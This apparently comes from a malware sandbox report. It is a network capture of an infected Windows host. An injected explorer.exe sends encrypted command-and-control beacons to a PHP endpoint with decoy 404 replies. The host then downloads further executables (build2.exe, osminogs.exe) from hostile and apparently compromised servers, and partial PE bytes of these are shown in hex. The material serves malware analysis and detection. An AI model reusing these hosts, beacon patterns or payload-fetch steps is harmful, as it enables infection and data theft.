Apr 4, 2024 17:48:59.115328074 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49723	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:59.405956984 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aygrwtlyeqtqcv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: trad-einmyus.com
Apr 4, 2024 17:48:59.405987978 CEST	126	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 4f ab 81 75 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dOu#HqcRM,98vb_J2[.2yQjP
Apr 4, 2024 17:48:59.701446056 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:59 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49724	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:59.993120909 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vottapluwptwea.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: trad-einmyus.com
Apr 4, 2024 17:48:59.993120909 CEST	310	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 50 b6 b8 76 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dPvE$VLyR5v:euaDnPdJEi(:aNS0E&~n`V[ieL8&Bnh^B0<h0yoCE#ZLs)TH@9
Apr 4, 2024 17:49:00.288186073 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49725	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:00.584096909 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qpiqwcfhkuvh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: trad-einmyus.com
Apr 4, 2024 17:49:00.584120035 CEST	151	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 54 c2 98 27 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dT'@:C)T^K(7 B^E>O%).>9IVWF>@cHr'?,~
Apr 4, 2024 17:49:00.877003908 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49726	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:01.164132118 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bvudrrycsbfpyj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 110 Host: trad-einmyus.com
Apr 4, 2024 17:49:01.164160967 CEST	110	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 29 a4 aa 07 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d)[%yRAd^}@IU
Apr 4, 2024 17:49:01.489068031 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49727	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:01.780769110 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ugqjwtqplqxf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: trad-einmyus.com
Apr 4, 2024 17:49:01.780833960 CEST	240	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 55 be 92 30 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dU0$}{I#8vv`k_Wblv]?IHu,$z;\|MkoB7jz< }(}m"_K!1>9c'7\'IA'f=Q,u
Apr 4, 2024 17:49:02.079312086 CEST	230	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cc d5 54 02 6c 5c e5 aa 81 fc ab 12 ea 15 da 2d b8 45 52 9d 0b fe ee 3a ae 2f 4d 1b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2fI:82OTl\-ER:/M0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49731	190.249.187.165	80	3944	C:\Users\user\AppData\Local\Temp\1601.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:03.873203993 CEST	91	OUT	GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: sdfjhuz.com
Apr 4, 2024 17:49:04.602121115 CEST	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Apr 2024 15:49:04 GMT Content-Type: application/octet-stream Content-Length: 326144 Last-Modified: Wed, 03 Apr 2024 09:21:31 GMT Connection: close ETag: "660d1f9b-4fa00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 77 ce 1f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 08 01 00 00 b4 45 00 00 00 00 00 f1 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 46 00 00 04 00 00 8f fa 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 8c 01 00 8c 00 00 00 00 80 45 00 72 51 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 22 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d3 06 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 75 00 00 00 20 01 00 00 76 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 d7 43 00 00 a0 01 00 00 26 02 00 00 82 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 72 51 01 00 00 80 45 00 00 52 01 00 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELweE= @FErQ"8 @ .text `.rdatau v@@.data`C&@.rsrcrQER@@
Apr 4, 2024 17:49:04.602143049 CEST	1286	IN	Data Raw: b9 88 66 85 00 e8 27 02 00 00 68 c9 16 41 00 e8 f7 22 00 00 59 c3 b9 90 66 85 00 e8 7a 02 00 00 68 bf 16 41 00 e8 e1 22 00 00 59 c3 b9 7c 66 85 00 e8 d1 02 00 00 68 b5 16 41 00 e8 cb 22 00 00 59 c3 6a 00 b9 84 66 85 00 e8 c7 00 00 00 c3 6a 00 b9 Data Ascii: f'hA"YfzhA"Y\|fhA"YjfjxfjfjfUQQQQ$!]EYY]UQQQQ$P*]EYY]UE]UE8u3]PEY]U}uE]]U
Apr 4, 2024 17:49:04.602155924 CEST	1286	IN	Data Raw: 8d 85 b0 fb ff ff 50 53 ff 15 90 20 41 00 8d 45 cc 50 53 8d 45 b0 50 53 ff 15 40 20 41 00 53 53 53 53 ff 15 68 20 41 00 8b 4d f0 2b f1 8b c6 c1 e0 04 89 45 fc 8b 45 dc 01 45 fc 8b 45 f8 8b de 8b 4d f4 03 c6 8b 55 fc d3 eb 33 d0 03 5d e4 81 3d 6c Data Ascii: PS AEPSEPS@ ASSSSh AM+EEEEMU3]=le]Uu AU]3UV}E)EMM]uuE>_F^[]UleVW=dt/=YujPh~A ANtle
Apr 4, 2024 17:49:04.602169991 CEST	1286	IN	Data Raw: 32 32 b8 c6 b8 07 42 f7 64 24 18 8b 44 24 18 81 6c 24 20 83 4d 1a 54 81 6c 24 24 81 db a5 0f b8 fd dd 44 53 f7 64 24 18 8b 44 24 18 81 6c 24 0c f0 06 bd 57 81 6c 24 38 f5 90 30 07 81 6c 24 2c 7b e3 2f 6b 33 db 81 3d 6c 65 85 00 00 04 00 00 0f 85 Data Ascii: 22Bd$D$l$ MTl$$DSd$D$l$Wl$80l$,{/k3=leSS\| A` ASS AS$\|PSS\ AD$`PH ASSS ASD$\|PhA ASSSS(SWD$@D$@SlYSYSl A8q F
Apr 4, 2024 17:49:04.761926889 CEST	1286	IN	Data Raw: ce 0f e8 b8 ff ff ff 8b d8 3b de 73 05 8b 75 08 eb 27 33 d2 c7 45 e8 03 00 00 00 8b c6 8b 4f 14 f7 75 e8 d1 e9 3b c8 76 10 8b 57 14 8b c3 2b c1 8d 34 11 3b d0 76 02 8b f3 83 65 fc 00 8d 46 01 50 8d 45 ef 8b cf 50 e8 81 fd ff ff 8b c8 e8 c5 00 00 Data Ascii: ;su'3EOu;vW+4;veFPEPM]8EME@ePEEPTE@M}u]}vuPSjjEPWEPluwM_^d[]
Apr 4, 2024 17:49:04.761990070 CEST	1286	IN	Data Raw: 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76 fc 8b ff 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 04 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 04 66 0f 7f 47 10 66 Data Ascii: fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v\|ovfsvs~vf%@ur*$%@r$%@$&@$
Apr 4, 2024 17:49:04.762105942 CEST	1286	IN	Data Raw: a0 41 00 5d c3 e8 92 1c 00 00 85 c0 74 08 6a 16 e8 b0 1c 00 00 59 f6 05 00 a0 41 00 02 74 21 6a 17 e8 1c ed 00 00 85 c0 74 05 6a 07 59 cd 29 6a 01 68 15 00 00 40 6a 03 e8 7d 1e 00 00 83 c4 0c 6a 03 e8 95 0f 00 00 cc 55 8b ec 8b 45 08 85 c0 75 14 Data Ascii: A]tjYAt!jtjY)jh@j}jUEu/ 3]@]WVt$L$\|$;v;h%Cs3u% A%Cs
Apr 4, 2024 17:49:04.762192965 CEST	1286	IN	Data Raw: 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 64 2e 40 00 8b ff 74 2e 40 00 7c 2e 40 00 8c 2e 40 00 a0 2e 40 00 8b 44 Data Ascii: DDDDDDDDDDD$d.@t.@\|.@.@.@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`f
Apr 4, 2024 17:49:04.762375116 CEST	1286	IN	Data Raw: 00 00 83 65 e4 00 33 c0 8b 7d 08 85 ff 0f 95 c0 85 c0 75 14 e8 61 16 00 00 c7 00 16 00 00 00 e8 e7 15 00 00 33 c0 eb 7e 33 c0 8b 5d 0c 85 db 0f 95 c0 85 c0 74 de 33 c0 38 03 0f 95 c0 85 c0 74 d3 e8 0a 1f 00 00 8b f0 89 75 08 85 f6 75 0d e8 26 16 Data Ascii: e3}ua3~3]t38tuu&e?u jEPh Av"VuSW}Eu}V1YUj@uu,]5C AtjjYY_
Apr 4, 2024 17:49:04.762435913 CEST	1286	IN	Data Raw: ff 59 ff 75 08 ff 15 d0 20 41 00 cc 55 8b ec e8 f5 3a 00 00 ff 75 08 e8 4a 3b 00 00 59 68 ff 00 00 00 e8 a3 00 00 00 cc 6a 01 6a 01 6a 00 e8 4d 01 00 00 83 c4 0c c3 6a 01 6a 00 6a 00 e8 3e 01 00 00 83 c4 0c c3 55 8b ec 83 3d a0 30 41 00 00 74 19 Data Ascii: Yu AU:uJ;YhjjjMjjj>U=0Ath0A$=Ytu0AY>h!Ah!AYYuChm@L$!Ah!Av=LwYYthLw<YtjjjLw3]Ujju]Vj AV=V
Apr 4, 2024 17:49:04.762487888 CEST	1260	IN	Data Raw: 79 08 6a 08 e8 fd fa ff ff 59 e8 5c 4b 00 00 85 c0 79 08 6a 09 e8 ec fa ff ff 59 6a 01 e8 1e fb ff ff 59 85 c0 74 07 50 e8 d9 fa ff ff 59 e8 60 4d 00 00 56 50 6a 00 68 00 00 40 00 e8 04 db ff ff 8b f0 89 75 dc 85 db 75 06 56 e8 59 fd ff ff e8 dc Data Ascii: yjY\KyjYjYtPY`MVPjh@uuVY.MEQPVGYYeuu}uVDEU=Cu^5u5h9YY]K; AuIMU VWjY0A}u}t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49730	103.23.232.80	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:03.914000034 CEST	165	OUT	GET /osminogs.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: m2reg.ulm.ac.id
Apr 4, 2024 17:49:04.286798954 CEST	1286	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:04 GMT Server: Apache Last-Modified: Thu, 07 Mar 2024 16:56:25 GMT ETag: "682058-61314f4b1ca93" Accept-Ranges: bytes Content-Length: 6824024 Cache-Control: max-age=31536000, public Expires: Fri, 04 Apr 2025 15:49:04 GMT Vary: Accept-Encoding Referrer-Policy: no-referrer-when-downgrade Pragma: public Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 0a 00 69 3a e2 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 50 03 00 00 a4 13 00 00 00 00 00 7f e5 97 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 ce 00 00 04 00 00 ba bb 68 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c7 98 00 f0 00 00 00 00 40 ca 00 28 07 04 00 00 00 00 00 00 00 00 00 00 06 68 00 58 1a 00 00 00 20 ca 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 66 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2b 4f 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c3 29 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 9b 00 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 cb 86 c2 a4 29 59 34 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 cb 86 c2 a4 a0 12 1e 00 00 90 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 c2 a2 7b c2 4b 70 0f 00 00 b0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 a2 7b c2 24 02 00 00 00 30 66 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 a2 7b c2 d0 d9 63 00 00 40 66 00 00 da 63 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 24 1a 00 00 00 20 ca 00 00 1c 00 00 00 e2 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 07 04 00 00 40 ca 00 00 08 04 00 00 fe 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELi:eP@Ph@@(hX $0f.text+O `.rdata)`@@.data8@.vmp)Y40``.vmp8``.vmp{KpV `.vmp{$0f@.vmp{c@fc `.reloc$ c@@.rsrc(@c@@
Apr 4, 2024 17:49:04.286815882 CEST	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Vng@l
Apr 4, 2024 17:49:04.286829948 CEST	1286	IN	Data Raw: 13 c8 53 79 f4 68 c3 d3 73 c2 9d 0b ce ac 9b 67 59 ce 46 bb af 5e 30 b9 e5 1c bc 49 5d f8 96 07 5b be 1e ab 10 83 82 c1 d2 a5 64 ef 7c 53 92 09 9a f5 34 6b 78 e3 df 6e 00 b1 f2 fd 4c ec 5d c4 f2 74 1f ec 20 f0 b9 f3 98 5a b1 1f 04 69 c6 20 ee 67 Data Ascii: SyhsgYF^0I][d\|S4kxnL]t Zi g*hSyO+!0nduncE`;`RyXW3C`<=QWu8 Sy=DpF4/cSyIT[u.>=@bsaQl+cn$1n76tc
